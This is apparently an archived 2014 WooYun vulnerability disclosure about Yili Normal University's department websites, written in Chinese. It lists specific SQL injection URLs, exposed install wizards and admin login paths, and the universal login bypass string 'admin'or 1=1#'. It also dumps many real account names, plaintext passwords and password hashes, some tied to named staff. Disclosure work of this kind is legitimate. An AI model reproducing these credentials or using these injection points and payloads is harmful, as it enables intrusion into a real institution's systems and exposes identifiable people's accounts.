乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-22: 细节已通知厂商并且等待厂商处理中 2014-09-27: 厂商已经主动忽略漏洞,细节向公众公开
RT一路走好!
主站域名
http://www.ylsy.edu.cn/
PS:以下信息部分站点可能失效,因为管理员发觉了。关闭了部分站点。更改了密码!声明,图片为证分站多处打包:
http://rw.ylsy.edu.cn 人文学院http://fzxy.ylsy.edu.cn 政法学院http://hxx.ylsy.edu.cn/ 化学学院http://dxxy.ylsy.edu.cn/ 电子与信息工程学院http://zyx.ylsy.edu.cn/ 中国语言学院http://sxx.ylsy.edu.cn/ 数字与统计学院http://tyxy.ylsy.edu.cn/ 体育学院http://jyjs.ylsy.edu.cn/ 教育科学系http://wyx.ylsy.edu.cn/ 外语系http://wlxy.ylsy.edu.cn/ 物理科学与技术学院http://ysxy.ylsy.edu.cn/ 艺术学院
基本上phpweb的连接都能爆出来不少
phpweb通用万能密码admin'or 1=1# 存在 /base/install/ 安装向导http://zygb.ylsy.edu.cn/dhlm/jgsz/jxdw/ 上面11个的快速连接点http://wyx.ylsy.edu.cn/ 伊犁师范学院http://wyx.ylsy.edu.cn/news/html/index.php?id=518 注入点 root root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26 ces root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26 wyx root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26 admin xdy1277 管理员 7c6000185258aa0739456af70eb01cce kangqian dd060606 53631ad8e712f04ba447db2600eca612 shenke shenke123.com 6f3e76ffebd7ffb654704ca82c5ea839 ly ly7686 路玉 67025d48b8101d4e53b91b84fb2b7728 zzgl d301b85302dc20a0cdc961731ae6291d xsk xsk123 cb8ad8f973202ec824fdcb606f7527e5 zzgl zzgl123 xjk xjk123 cd3970e3cfef2138c93585f05b6d3dcchttp://nic.ylsy.edu.cn/admin/ 后台http://nic.ylsy.edu.cn/index.php?mid=1 注入点 ptadmin 123456 e10adc3949ba59abbe56e057f20f883e admin admin123 0192023a7bbd73250516f069df18b500http://sxx.ylsy.edu.cn/base/admin/index.php 后台http://yjsc.ylsy.edu.cn/admin/xyeWebEditor/admin/login.asp 编辑器后台http://yjsc.ylsy.edu.cn/news.asp?id=52 注入点http://yjsc.ylsy.edu.cn/admin/xycms.asp 后台 admin adminadmin f6fdffe48c908deb0f4c3bd36c032e72 方之恒 123456 e10adc3949ba59abbe56e057f20f883ehttp://xbbj.ylsy.edu.cn/admin.php 学报http://xbbj.ylsy.edu.cn/news/html/index.php?id=511 注入点 xbbj root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26 root root root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26 admin jiayz089 00dc1abc8fbce8009fdaa138e682477b caolinhong clh123456 f3594dfd18db621a124313b573bcf1c5 zhangjianguo zjg123456 edd6f69ca19ab9ab5350bb4d06262cbe何苗苗 hemiaomiao 4241242c913931618d1efd402b55272d
学校的网段也是够强大的(PS:可能切糕生意太好了吧。。。)
这个在网站3306端口自动下载就不明白了
我就传图了。不打字了。好难打。
此处为某站点实例
总结,学院的网站三大系统PHPWEB DEDECMS ESPCMS
更新到最新版或者整个网段改造吧,工程大。
危害等级:无影响厂商忽略
忽略时间:2014-09-27 12:04
暂无